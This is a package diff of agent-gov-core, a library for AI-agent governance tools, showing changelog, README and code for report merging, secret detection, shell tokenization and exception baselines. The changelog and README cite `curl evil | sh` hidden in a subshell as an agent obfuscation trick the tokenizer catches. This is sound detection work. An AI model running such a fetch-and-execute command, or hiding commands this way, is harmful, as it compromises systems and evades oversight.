agent-gov-core 0.4.3 → 0.7.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/CHANGELOG.md CHANGED
@@ -2,6 +2,107 @@
2
2
 
3
3
  All notable changes to this project will be documented here. The format follows [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). Under v1.0, minor versions may include breaking changes — see [CONTRIBUTING.md](./CONTRIBUTING.md#backwards-compatibility) for the rules.
4
4
 
5
+ ## [0.7.0] — 2026-05-22
6
+
7
+ **The pre-v1.0 consolidation release.** Bundles everything that was queued for v0.6.0 (report envelope + merge layer + OTel GenAI interop) plus two universal detectors promoted from consumer repos: `matchSecret` (from PolicyMesh) and `applyExceptions` (unifying PolicyMesh's `subject` and TaskBound's `allow_paths` shapes).
8
+
9
+ No breaking changes to the v0.5.0 surface — additive minor bump. One npm publish covers all of it.
10
+
11
+ This is the last release before v1.0 freeze. The remaining gate is consumer-side: at least one tool wiring `generateWorkflowSummary` end-to-end, then v1.0 with semver guarantees on the contract pinned by the golden tests.
12
+
13
+ ### Added — Report envelope
14
+ - `Report` interface — canonical multi-tool envelope with `schemaVersion`, `tool`, `rating`, optional `toolVersion`/`runId`/`conversationId`/`baseRef`/`headRef`, `findings: Finding[]`, and tool-specific extension `data`.
15
+ - `Report.conversationId` (optional) — agent session / PR review / thread identifier. Matches OpenTelemetry's `gen_ai.conversation.id` semantic convention so a consumer can pass the same string into both governance reports and OTel traces, then correlate them downstream.
16
+ - `REPORT_SCHEMA_VERSION` const (`'1.0'`).
17
+ - `schemas/report.schema.json` — JSON schema for the envelope, exposed via the package's `./schemas/report.schema.json` export.
18
+ - `createReport({tool, findings, ...})` — convenience constructor; sets `schemaVersion` and computes `rating` from max finding severity (unless overridden).
19
+ - `maxSeverity(findings)` — helper that returns `'none' | Severity` across a finding list.
20
+ - `validateReport(value)` — strict envelope check that also validates each contained finding and flags cross-field inconsistencies (e.g. rating below implied max).
21
+
22
+ ### Added — Merge layer
23
+ - `mergeFindings(reports, opts?)` — combine N tool reports into one normalized `MergedReport`:
24
+ - Deduplicates by `Finding.fingerprint`. Default policy: keep highest severity; `duplicatePolicy: 'first'` keeps the first occurrence.
25
+ - Optional severity `threshold` drops findings below the requested level into a counted `droppedBelowThreshold` field.
26
+ - Aggregates rating from the surviving findings, not source ratings — so threshold filtering correctly demotes the merged rating.
27
+ - Sorts findings by severity, highest first.
28
+ - Propagates `conversationId` to the merged report iff every source agrees. Cross-conversation mixing leaves the field intentionally empty so a meta-reviewer can detect misuse.
29
+ - **Never silently drops bad data**: malformed envelopes go to `invalidReports[]`, individual malformed findings go to `invalidFindings[]`. A single bad finding in a tool's report doesn't poison the rest of that report.
30
+ - `MergeOptions`, `MergeSource` (with optional `conversationId`), `MergedReport` (with optional `conversationId`), `InvalidReport`, `InvalidFinding` types.
31
+
32
+ ### Added — OpenTelemetry GenAI interop
33
+ - `docs/INTEROP-OTEL.md` — explicit cross-walk between `agent-gov-core` types and OTel's [`gen_ai.*` semantic conventions](https://opentelemetry.io/docs/specs/semconv/gen-ai/). Maps `Report.conversationId` ↔ `gen_ai.conversation.id`, documents why we adopt one bridge field and not the whole namespace, and shows a paired-emission pattern for orgs running OTel-instrumented agents alongside governance tools.
34
+
35
+ ### Added — Hardcoded secret detection (promoted from PolicyMesh)
36
+ - `matchSecret(value, options?)` — scans a string for provider-prefix credentials and returns `{ provider }` (never the literal credential). Built-in patterns: Anthropic, OpenAI (sk- + sk-proj-), GitHub (PAT + classic), Slack, AWS, Google, GitLab, npm, Docker, Stripe, plus a length-restricted hex token pattern gated to env/header context to avoid commit-SHA false positives.
37
+ - `MatchSecretOptions.envOrHeaderContext` — opt-in flag for the hex token pattern.
38
+ - `SECRET_PATTERNS` — exported read-only constant table; golden-tested so additions are non-breaking but removals require a major bump.
39
+ - `SecretMatch` type.
40
+ - `env:VAR` references are never flagged (Codex notation for env-var lookups).
41
+
42
+ ### Added — Exception baselines (promoted + unified from PolicyMesh + TaskBound)
43
+ - `applyExceptions(findings, exceptions, now?)` — suppress (or downgrade-on-expiry) findings matched by `kind` + optional `salientKey` + optional `pathPrefix`. PolicyMesh's `.policymesh-exceptions.json` shape and TaskBound's `.taskbound.yml` `ignore_kinds`/`allow_paths` shape both map cleanly onto this unified primitive.
44
+ - Expired exceptions don't silently drop — they re-surface with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]` message prefix so stale baselines stay visible. Reason text propagates to `finding.data.exceptionReason`.
45
+ - `validateException(value)` — runtime check for well-formed exception entries.
46
+ - `Exception`, `ApplyExceptionsResult` types.
47
+
48
+ ### Tests
49
+ - 57 new cases. 220 total (up from 163). Breakdown:
50
+ - Report: 17 (schemaVersion pinning, rating derivation, explicit-rating override, validateReport accepting/rejecting envelope-level errors, finding-tool consistency, unknown property rejection, downgrade-allowed/upgrade-flagged rating consistency, conversationId passthrough + type check).
51
+ - Merge: 14 (empty input, cross-tool combine, fingerprint dedup with `highest_severity` and `first` policies, salientKey-disambiguated findings stay separate, threshold filtering, malformed report → invalidReports, malformed finding → invalidFindings, severity-sorted output, aggregate-rating-reflects-survivors, source provenance, conversationId agreement/disagreement/partial-coverage propagation).
52
+ - Secrets: 11 (each provider class detected, env: refs never flagged, empty/short input ignored, hex token gated to env/header context, non-hex 40-char string rejected, never-leak-literal contract, golden-pinned `SECRET_PATTERNS` provider set).
53
+ - Exceptions: 15 (empty input identity, suppress by kind/salientKey/pathPrefix, perpetual-active when no expires, expired surfacing with downgrade/prefix/reason, non-matching kind/salientKey passthrough, pathPrefix without location.file safely non-matches, malformed expires treated as never-expires, future expires stays active, validateException accept/reject paths).
54
+
55
+ ## [0.5.0] — 2026-05-22
56
+
57
+ Three additive features completing the queue from Gemini's third inspection round, plus five correctness fixes from a deep code-level inspection done before publish. No breaking changes — existing exports and call signatures unchanged.
58
+
59
+ Minor bump (not patch) because the surface grew: three new top-level exports.
60
+
61
+ ### Fixed (pre-publish inspection sweep — Gemini + Cody)
62
+ - `tokenizeShell` no longer splits on `&` inside file-descriptor redirections (`2>&1`, `>&2`, `<&3`). The single-`&` separator rule now checks the preceding non-whitespace character.
63
+ - `tokenizeShellDeep` no longer false-positives on `bash -c` text inside double-quoted echo arguments. Previously a whole-string regex matched `bash -c` anywhere, including data being printed. Detection now runs inside the quote-aware walk and only fires at command boundaries outside quoted regions.
64
+ - `updateMultilineStringState` (TOML locator) now tracks backslash escapes inside basic multi-line strings (`"""…"""`). An escaped `\"""` inside the value no longer prematurely terminates the string-state walker, which had caused decoy keys to match. Literal strings (`'''…'''`) intentionally don't track escapes per TOML spec.
65
+ - `lineOfTomlKey` now finds dotted keys nested under any prefix table — not just at file root. `[a]\nb.c = 42` is now reachable as `a.b.c`. Same shape as the v0.4.4 top-level fix, generalized.
66
+ - `lineOfTomlKey` now matches spaced dotted keys (`a . b . c = 1`) which `parseToml` had always accepted but the locator's compact-only regex couldn't find. Pattern now builds from individual segments joined by `\s*\.\s*`.
67
+ - TOML parser correctly handles a line-ending backslash followed by trailing inline whitespace before the newline. Per spec, `"""line\ \nnext"""` strips the newline and trims leading whitespace on the next line. Previously the trailing spaces caused the backslash to be treated as a regular escape (which silently kept everything literally rather than throwing, but still wasn't spec-compliant).
68
+ - `normalizeMcpCommand` now treats common boolean long-flags (`--verbose`, `--quiet`, `--debug`, `--help`, `--version`, `--force`, `--dry-run`, `--no-cache`, `--no-color`, `--no-progress`, `--json`, plus short forms `-v -V -q -h -d`) as standalone instead of greedily pairing them with the next positional. Configs with `--verbose pkg` no longer normalize differently depending on flag order.
69
+ - `normalizeExecutable` (MCP) now lowercases Windows-shaped executable names (those with `\` separators or `.cmd`/`.exe`/`.bat`/`.ps1` suffix) so `NPX.CMD` and `npx` produce identical identity strings. POSIX paths keep their case because `./curl` and `./CURL` are genuinely different files there. The JSDoc had claimed this behavior since v0.1; only now does the implementation match.
70
+ - `normalizeExecutable` (MCP) also drops the directory portion of paths whose basename matches a known runtime (`node`, `npx`, `python`, `bash`, etc.). `/usr/local/bin/node`, `/usr/bin/node`, `node`, and `C:\Program Files\NodeJS\node.exe` all produce `cmd=node` now. Closes a long-standing PolicyMesh `mcp_command_mismatch` false-positive class across cross-platform team setups. Custom scripts at absolute paths (`/opt/internal/orchestrator.sh`) keep their full path because path is part of their identity.
71
+ - `generateWorkflowSummary` now HTML-escapes `<`, `>`, and `&` in message cells. A finding message containing `</summary>` or `<h1>` could otherwise break out of the wrapping `<details>` block and manipulate the rendered layout of the GHA step summary page.
72
+
73
+ ### Added
74
+ - `tokenizeShellDeep(command)` — recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal per shell semantics). Conservative implementation — handles common shapes, not a full shell parser; nesting depth capped at 8.
75
+ - `ConfigParseError` — structured parse error with `line`, `column`, `rawOffset`, and `cause`. `readJsonObjectWithSource` and `readTomlObject` now wrap their underlying parser errors with this type whenever a byte offset can be recovered. Lets downstream tools emit a `*.config_syntax_error` Finding pointing at the exact spot without recomputing line numbers.
76
+ - `lineColumnOfOffset(text, offset)` — utility to convert a 0-based byte offset to 1-based `{ line, column }`. Pairs with the new error type.
77
+ - `generateWorkflowSummary(findings, opts?)` — Markdown summary for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks; escapes pipe/newline in message cells; truncates long messages; caps per-severity rows with an overflow indicator. Closes the GHA annotation-cap visibility gap (10 per level, 50 per run silently dropped) by guaranteeing 100% of findings appear in the workflow summary page.
78
+
79
+ ### Changed
80
+ - TOML parser semantic errors (`Duplicate key`, `Duplicate key in inline table`, `Duplicate table definition`, `Cannot redefine array-of-tables …`) now include `at offset N` in the message so `readTomlObject` can resolve them to a line.
81
+
82
+ ### Tests
83
+ - 55 new cases. 163 total (up from 108). Coverage:
84
+ - tokenizeShellDeep: subshells, backticks, `-c` payloads, single-quote literal handling, nested subshells, no-op pass-through, integration with `getCommandHead`. (9 cases)
85
+ - parse-error: offset → line/column conversion (5 edge cases), structured wrap on JSON and TOML, `parseToml` direct call unchanged, `cause` preservation. (10 cases)
86
+ - generateWorkflowSummary: empty findings, severity ordering, totals, pipe/newline escape, truncation, per-group cap with overflow, missing location, HTML escape, ampersand escape. (9 cases)
87
+ - Inspection regressions: 14 cases covering `2>&1`, escaped `\"""`, table-nested dotted keys, line-ending backslash, known-boolean flags, quoted `bash -c` data, Windows case-folding, POSIX case preserved, spaced dotted keys, path de-noise across platforms, custom-script identity preservation.
88
+ - **Golden compatibility tests** (`test/golden.test.mjs`): 11 cases pinning specific fingerprint hashes and `normalizeMcpCommand` canonical strings. These are the contract — breaking them requires a major bump and migration plan.
89
+
90
+ ## [0.4.4] — 2026-05-22
91
+
92
+ Cody-led inspection (third reviewer, third round) caught five issues, two of them P0 regressions I introduced in my own v0.4.2 / v0.4.3 fixes. All five fixed here.
93
+
94
+ ### Fixed
95
+ - **P0**: `fingerprintFinding` no longer appends an empty-string segment for findings without `salientKey`. v0.4.3 added `?? ''` which silently changed the hash for every existing finding and broke the v0.4.2 → v0.4.3 backwards-compat claim in my own changelog. Pinned by a new test that asserts the specific v0.4.2-form hash for a salient-less finding.
96
+ - **P0**: TOML parser no longer rejects valid subtable headers repeated under separate array-of-tables entries. `[[fruits]] [fruits.physical] [[fruits]] [fruits.physical]` now parses correctly — each `[[fruits]]` entry resets the "already defined" status of subtable paths under that AOT. My v0.4.2 `definedTables` guard was global per-file when it should have been scoped to the current AOT entry.
97
+ - `lineOfJsonStringValue` no longer matches occurrences in key position. Searching for value `"command"` in `{"command":"npx", "args":["command"]}` now returns the array-element line, not the key. Negative lookahead `(?!\s*:)` after the closing quote.
98
+ - `lineOfTomlKey` now finds top-level dotted keys. `lineOfTomlKey('a.b.c = 1', 'a.b.c')` returns 1 instead of 0 — the dotted-key check was gated behind `inTargetTable` which is false at file root.
99
+
100
+ ### Changed
101
+ - `package-lock.json` resynced to 0.4.4. Was drifting at 0.4.2 because previous releases bumped `package.json` without running `npm install` to refresh the lockfile.
102
+
103
+ ### Tests
104
+ - 6 new cases: pinned v0.4.2-form fingerprint hash, JSON value-vs-key disambiguation (+ colon-in-value sanity check), top-level dotted TOML keys, AOT subtable repeat across entries (+ within-entry duplicate still rejected). 108 total (up from 102).
105
+
5
106
  ## [0.4.3] — 2026-05-22
6
107
 
7
108
  Third Gemini-inspection round caught one confirmed bug, one disguised-as-suggestion bug, and three feature opportunities. Both bugs fixed here; the feature work is queued for v0.5.0.
package/README.md CHANGED
@@ -33,7 +33,7 @@ const finding = createFinding({
33
33
  // finding.fingerprint === '<stable 16-char hex>'
34
34
  ```
35
35
 
36
- `createFinding` calls `kind()` to build the namespaced kind, validates the slug shape, and computes a stable `fingerprintFinding(finding)` hash of `(kind, file, line, column)`.
36
+ `createFinding` calls `kind()` to build the namespaced kind, validates the slug shape, and computes a stable `fingerprintFinding(finding)` hash of `(kind, file, line, column, salientKey?)`. Pass `salientKey` when two distinct findings can legitimately fire at the same `(kind, file, line)` site (e.g. two suspicious imports on one line) so the meta-reviewer doesn't collapse them into one.
37
37
 
38
38
  ### Validate findings from disk
39
39
 
@@ -54,6 +54,28 @@ for (const f of report.findings) {
54
54
  }
55
55
  ```
56
56
 
57
+ ### Merge reports across tools (the meta-reviewer pipeline)
58
+
59
+ A cross-tool meta-reviewer ingests JSON reports from N tools, dedupes findings by fingerprint, applies a severity threshold, and rolls up an aggregate rating. The library ships this as `mergeFindings`:
60
+
61
+ ```ts
62
+ import { mergeFindings } from 'agent-gov-core';
63
+ import { readFileSync } from 'node:fs';
64
+
65
+ const reports = [
66
+ JSON.parse(readFileSync('scopetrail-report.json', 'utf8')),
67
+ JSON.parse(readFileSync('policymesh-report.json', 'utf8')),
68
+ JSON.parse(readFileSync('capabilityecho-report.json', 'utf8')),
69
+ ];
70
+
71
+ const merged = mergeFindings(reports, { threshold: 'medium' });
72
+ console.log(`Merged rating: ${merged.rating}`);
73
+ console.log(`${merged.findings.length} unique findings across ${merged.sources.length} tools`);
74
+ console.log(`Dropped ${merged.droppedBelowThreshold} below threshold; collapsed ${merged.duplicateCollapsed} duplicates`);
75
+ ```
76
+
77
+ Malformed reports go to `merged.invalidReports`; malformed individual findings go to `merged.invalidFindings` — neither is silently dropped, so a meta-reviewer can surface what went wrong.
78
+
57
79
  ### Schema is the contract
58
80
 
59
81
  The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json) is the single source of truth for the dotted-kind shape, the closed `tool` enum, and the location fields. Any tool emitting unprefixed kinds will fail validation. See [CONTRIBUTING.md](./CONTRIBUTING.md#the-finding-schema-is-the-contract) for how the TypeScript types and JSON schema are kept in lockstep.
@@ -69,11 +91,30 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
69
91
  - `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column, salientKey?)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe. Pass `salientKey` (since v0.4.3) when multiple distinct findings can fire at the same site
70
92
  - `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`
71
93
 
94
+ ### Hardcoded secret detection (since v0.7.0)
95
+ - `matchSecret(value, options?)` — scans for provider-prefix credentials (Anthropic, OpenAI, GitHub, AWS, Slack, Google, GitLab, npm, Docker, Stripe, plus env/header-gated hex tokens). Returns `{ provider }` — **never the literal credential**. Pass `envOrHeaderContext: true` only when scanning env/header values.
96
+ - `SECRET_PATTERNS` — read-only constant; the active provider set is pinned by golden tests so additions stay non-breaking.
97
+
98
+ ### Exception baselines (since v0.7.0)
99
+ - `applyExceptions(findings, exceptions, now?)` — suppress findings matched by `kind` + optional `salientKey` + optional `pathPrefix`. Expired exceptions re-surface the finding with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]` prefix so stale baselines stay visible.
100
+ - `validateException(value)` — runtime check for well-formed exception entries loaded from JSON/YAML.
101
+
102
+ ### Report envelope and merge (since v0.6.0)
103
+ - `Report` — canonical multi-tool envelope wrapping a `Finding[]` with `schemaVersion`, `tool`, `rating`, optional `toolVersion`/`runId`/`conversationId`/`baseRef`/`headRef`, and tool-specific extension data in `data`
104
+ - `Report.conversationId` — opt-in session identifier matching OpenTelemetry's [`gen_ai.conversation.id`](https://opentelemetry.io/docs/specs/semconv/gen-ai/) so governance findings and runtime traces can correlate by the same string. See [docs/INTEROP-OTEL.md](./docs/INTEROP-OTEL.md) for the full cross-walk.
105
+ - `REPORT_SCHEMA_VERSION` — current envelope version (`'1.0'`)
106
+ - `createReport({tool, findings, ...})` — sets `schemaVersion` and derives `rating` from max finding severity
107
+ - `maxSeverity(findings)` — returns `'none' | Severity`, used by `createReport`
108
+ - `validateReport(value)` — strict envelope check including each finding; returns `{ ok, errors[] }`
109
+ - `mergeFindings(reports, opts?)` — combine N tool reports, dedupe by fingerprint, apply threshold, roll up rating; preserves both invalid envelopes and invalid findings separately so nothing is silently dropped. Propagates `conversationId` to the merged report iff every source agrees on it.
110
+
72
111
  ### Config readers
73
- - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`; `value` and `json` reference the same parsed object `json` is kept as a deprecated alias.
112
+ - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`. When the underlying parser provides a byte offset, `parseError` is a `ConfigParseError` carrying `line`/`column`/`rawOffset` instead of a raw `Error`.
74
113
  - `stripJsonComments(text)` — same logic exposed for in-memory text
75
- - `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`; `value` and `toml` reference the same parsed object — `toml` is kept as a deprecated alias.
76
- - `parseToml(text)` — same exposed for text
114
+ - `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`. Errors are also `ConfigParseError` with `line`/`column`/`rawOffset` when resolvable.
115
+ - `parseToml(text)` — same exposed for text; throws raw `Error` (file-level wrapping happens in `readTomlObject`)
116
+ - `ConfigParseError` — structured parse error with `line`, `column`, `rawOffset`, and `cause`. Lets downstream tools emit a `*.config_syntax_error` finding pointing at the exact spot.
117
+ - `lineColumnOfOffset(text, offset)` — convert a 0-based byte offset to 1-based `{ line, column }`. Useful when a hand-rolled scanner exposes byte positions and a `Finding.location` needs line/column.
77
118
 
78
119
  ### Line locators
79
120
  - `lineOfJsonKey(text, key, scope?)` — 1-based line of `"key":`, optionally scoped to a byte range
@@ -81,16 +122,23 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
81
122
  - `lineOfTomlKey(text, dottedKey, scope?)` — 1-based line of a TOML key, optionally scoped to a byte range. Use scope to disambiguate `[[array]]`-of-tables entries that share the same leaf key.
82
123
 
83
124
  ### MCP command normalization
84
- - `normalizeMcpCommand({ command, args, url, env, cwd })` — canonical identity string for an MCP server entry. Drops neutral confirm flags (`-y`, `--yes`), strips Windows executable suffixes (`.cmd`, `.exe`, `.bat`, `.ps1`), sorts non-neutral flags alphabetically, preserves positional argument order, and includes env + cwd in the identity. Used to dedupe `mcp_command_mismatch` false positives when servers are equivalent but syntactically different (`npx -y foo@1.2.3` vs `npx foo@1.2.3`). Does not interpret what npx/uvx invocations resolve to at runtime — that's outside the substrate's scope.
125
+ - `normalizeMcpCommand({ command, args, url, env, cwd })` — canonical identity string for an MCP server entry. Used to dedupe `mcp_command_mismatch` false positives when servers are equivalent but syntactically different across machines / config files. Does not interpret what npx/uvx invocations resolve to at runtime — that's outside the substrate's scope.
126
+ - Drops neutral confirm flags (`-y`, `--yes`) so `npx -y foo` and `npx foo` collapse to the same identity.
127
+ - Strips Windows executable suffixes (`.cmd`, `.exe`, `.bat`, `.ps1`) and case-folds Windows-shaped paths — `NPX.CMD`, `npx.cmd`, and `npx` are all the same executable on Windows.
128
+ - For known runtimes (`node`, `npx`, `python`, `bash`, etc.), drops the directory portion of absolute paths so `/usr/bin/node`, `/usr/local/bin/node`, and `node` produce identical identity. Custom scripts at absolute paths keep their full path.
129
+ - Treats common boolean flags (`--verbose`, `--quiet`, `--debug`, `--help`, `--version`, `--force`, `--dry-run`, `--json`, etc.) as standalone instead of greedily pairing them with the next positional argument.
130
+ - Sorts non-neutral `--key value` flag pairs alphabetically, preserves positional argument order, includes env + cwd in the identity.
85
131
 
86
132
  ### Shell tokenization
87
133
  - `tokenizeShell(command)` — quote-aware split on `;`, `|`, `&&`, `||` plus trivial obfuscation neutralization (`c""url` → `curl`, `c\\url` → `curl`)
134
+ - `tokenizeShellDeep(command)` — recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal, per shell semantics).
88
135
  - `getCommandHead(subcommand)` — extract the leading verb after tokenization
89
136
 
90
137
  ### GitHub Action helpers
91
138
  - `rankSeverity(s)` — numeric rank `low=1, medium=2, high=3, critical=4` (matches the schema's closed severity enum; there is no `none`)
92
139
  - `passesSeverityThreshold(s, threshold)`, `anyAtOrAbove(findings, threshold)` — fail-on plumbing
93
140
  - `emitFindingAnnotation(f)` — render a Finding as a `::warning file=…,line=…,title=…::…` GitHub workflow annotation
141
+ - `generateWorkflowSummary(findings, opts?)` — Markdown summary suitable for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks so 100% of findings remain visible even when GHA's inline-annotation cap (~10 per level, 50 per run) silently drops the rest
94
142
 
95
143
  ### Test fixtures (`agent-gov-core/test-utils`)
96
144
  Secondary entry point used by consumer test suites. Zero overhead in production — only loaded when test files import it.
package/dist/action.d.ts CHANGED
@@ -28,4 +28,34 @@ export declare function anyAtOrAbove(findings: readonly Finding[], threshold: Se
28
28
  * // → '::error file=.github/workflows/ci.yml,line=12,title=[capability_echo.workflow_permission_write] high::Workflow grants contents: write to PR-triggered jobs.'
29
29
  */
30
30
  export declare function emitFindingAnnotation(finding: Finding): string;
31
+ export interface WorkflowSummaryOptions {
32
+ /** Top-level heading. Default: `Findings`. */
33
+ title?: string;
34
+ /** Cap per severity group; remaining count rendered as `(+N more)`. Default: 100. */
35
+ perSeverityLimit?: number;
36
+ /** Truncate message to this many characters (with `…` suffix). Default: 200. */
37
+ messageMaxLength?: number;
38
+ }
39
+ /**
40
+ * Render a Markdown summary of findings suitable for writing to
41
+ * `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
42
+ * level, 50 per run) and silently drops the rest; the step summary has no
43
+ * such cap, so a Markdown table guarantees that 100% of findings are visible
44
+ * in the workflow's run summary page even when annotations are truncated.
45
+ *
46
+ * Findings are grouped by severity (critical → high → medium → low) inside
47
+ * collapsible `<details>` blocks. Each row carries file, line, kind, and a
48
+ * length-capped message. Pipe characters in message text are escaped so they
49
+ * don't break Markdown table rendering.
50
+ *
51
+ * @example
52
+ * import { generateWorkflowSummary } from 'agent-gov-core';
53
+ * import { appendFileSync } from 'node:fs';
54
+ *
55
+ * const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
56
+ * if (process.env.GITHUB_STEP_SUMMARY) {
57
+ * appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
58
+ * }
59
+ */
60
+ export declare function generateWorkflowSummary(findings: readonly Finding[], options?: WorkflowSummaryOptions): string;
31
61
  //# sourceMappingURL=action.d.ts.map
package/dist/action.js CHANGED
@@ -76,4 +76,102 @@ function escapeProperty(s) {
76
76
  .replace(/:/g, '%3A')
77
77
  .replace(/,/g, '%2C');
78
78
  }
79
+ /**
80
+ * Render a Markdown summary of findings suitable for writing to
81
+ * `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
82
+ * level, 50 per run) and silently drops the rest; the step summary has no
83
+ * such cap, so a Markdown table guarantees that 100% of findings are visible
84
+ * in the workflow's run summary page even when annotations are truncated.
85
+ *
86
+ * Findings are grouped by severity (critical → high → medium → low) inside
87
+ * collapsible `<details>` blocks. Each row carries file, line, kind, and a
88
+ * length-capped message. Pipe characters in message text are escaped so they
89
+ * don't break Markdown table rendering.
90
+ *
91
+ * @example
92
+ * import { generateWorkflowSummary } from 'agent-gov-core';
93
+ * import { appendFileSync } from 'node:fs';
94
+ *
95
+ * const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
96
+ * if (process.env.GITHUB_STEP_SUMMARY) {
97
+ * appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
98
+ * }
99
+ */
100
+ export function generateWorkflowSummary(findings, options = {}) {
101
+ const title = options.title ?? 'Findings';
102
+ const perGroupLimit = options.perSeverityLimit ?? 100;
103
+ const messageMax = options.messageMaxLength ?? 200;
104
+ if (findings.length === 0) {
105
+ return `# ${title}\n\nNo findings.\n`;
106
+ }
107
+ const groups = {
108
+ critical: [],
109
+ high: [],
110
+ medium: [],
111
+ low: [],
112
+ };
113
+ for (const f of findings)
114
+ groups[f.severity].push(f);
115
+ const counts = {
116
+ critical: groups.critical.length,
117
+ high: groups.high.length,
118
+ medium: groups.medium.length,
119
+ low: groups.low.length,
120
+ };
121
+ const lines = [];
122
+ lines.push(`# ${title}`, '');
123
+ lines.push(`**Total**: ${findings.length} finding${findings.length === 1 ? '' : 's'} — ` +
124
+ `${counts.critical} critical, ${counts.high} high, ` +
125
+ `${counts.medium} medium, ${counts.low} low`);
126
+ lines.push('');
127
+ const severityOrder = ['critical', 'high', 'medium', 'low'];
128
+ for (const severity of severityOrder) {
129
+ const group = groups[severity];
130
+ if (group.length === 0)
131
+ continue;
132
+ const shown = group.slice(0, perGroupLimit);
133
+ const overflow = group.length - shown.length;
134
+ lines.push(`<details${severity === 'critical' || severity === 'high' ? ' open' : ''}>`);
135
+ lines.push(`<summary><strong>${group.length} ${severity}</strong></summary>`);
136
+ lines.push('');
137
+ lines.push('| File | Line | Kind | Message |');
138
+ lines.push('|------|------|------|---------|');
139
+ for (const f of shown) {
140
+ lines.push('| ' +
141
+ [
142
+ escapeMarkdownTableCell(f.location?.file ?? '—'),
143
+ f.location?.line ?? '—',
144
+ escapeMarkdownTableCell(f.kind),
145
+ escapeMarkdownTableCell(truncate(f.message, messageMax)),
146
+ ].join(' | ') +
147
+ ' |');
148
+ }
149
+ if (overflow > 0) {
150
+ lines.push(`| _(+${overflow} more ${severity} finding${overflow === 1 ? '' : 's'})_ | | | |`);
151
+ }
152
+ lines.push('');
153
+ lines.push('</details>');
154
+ lines.push('');
155
+ }
156
+ return lines.join('\n');
157
+ }
158
+ function truncate(s, max) {
159
+ if (s.length <= max)
160
+ return s;
161
+ return s.slice(0, Math.max(1, max - 1)) + '…';
162
+ }
163
+ function escapeMarkdownTableCell(s) {
164
+ // Escape HTML control characters so a finding message containing
165
+ // `</summary>` or `<h1>` can't break out of the `<details>` block we
166
+ // emit around each severity group. GitHub sanitizes script execution,
167
+ // but unescaped tags still let an attacker manipulate the visual layout
168
+ // of the workflow summary (collapse other groups, inject misleading
169
+ // headings, etc.).
170
+ return String(s)
171
+ .replace(/&/g, '&amp;')
172
+ .replace(/</g, '&lt;')
173
+ .replace(/>/g, '&gt;')
174
+ .replace(/\|/g, '\\|')
175
+ .replace(/\r?\n/g, ' ');
176
+ }
79
177
  //# sourceMappingURL=action.js.map
@@ -0,0 +1,83 @@
1
+ /**
2
+ * Exception baselines — the "we know about this, suppress it for now" mechanism
3
+ * that PolicyMesh (`.policymesh-exceptions.json`) and TaskBound (`.taskbound.yml`
4
+ * `ignore_kinds` / `allow_paths`) both invented separately. Lifted into the
5
+ * substrate so all five tools share one shape and one expiry contract.
6
+ *
7
+ * Two design choices worth flagging:
8
+ *
9
+ * 1. Expired exceptions DON'T silently drop. They re-surface the original
10
+ * finding with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]`
11
+ * prefix on the message. The point of exception baselines is to make stale
12
+ * suppression visible, not to grow a graveyard of permanent ignores.
13
+ *
14
+ * 2. Match keys are `kind` (required) plus optional `salientKey` and
15
+ * `pathPrefix` narrowing. Subject/path matching from the two consumers
16
+ * maps cleanly: PolicyMesh's `subject` is now `salientKey`; TaskBound's
17
+ * `allow_paths` entries map to `pathPrefix` exceptions on the relevant
18
+ * finding kind.
19
+ */
20
+ import type { Finding } from './finding.js';
21
+ /**
22
+ * A single exception rule. Suppresses (or downgrades, when expired) findings
23
+ * whose `kind` matches and — if either narrower is set — whose `salientKey`
24
+ * or `location.file` prefix also matches.
25
+ */
26
+ export interface Exception {
27
+ /** Required: exact match against `Finding.kind`. */
28
+ kind: string;
29
+ /**
30
+ * Optional: exact match against `Finding.salientKey`. Use this to scope an
31
+ * exception to one specific finding instance at a site that produces
32
+ * multiple distinct findings (e.g. one of several suspicious packages on
33
+ * the same import line).
34
+ */
35
+ salientKey?: string;
36
+ /**
37
+ * Optional: only match findings whose `location.file` starts with this
38
+ * string. Use to scope an exception to a directory subtree without listing
39
+ * every file individually (TaskBound's `allow_paths` use case).
40
+ */
41
+ pathPrefix?: string;
42
+ /**
43
+ * Optional ISO 8601 date (YYYY-MM-DD or full timestamp). When the current
44
+ * date is past `expires`, matched findings re-surface with severity
45
+ * downgraded to `'low'` and an `[EXPIRED WHITELIST]` message prefix.
46
+ */
47
+ expires?: string;
48
+ /** Optional free-text rationale, preserved on expired findings via `data.exceptionReason`. */
49
+ reason?: string;
50
+ }
51
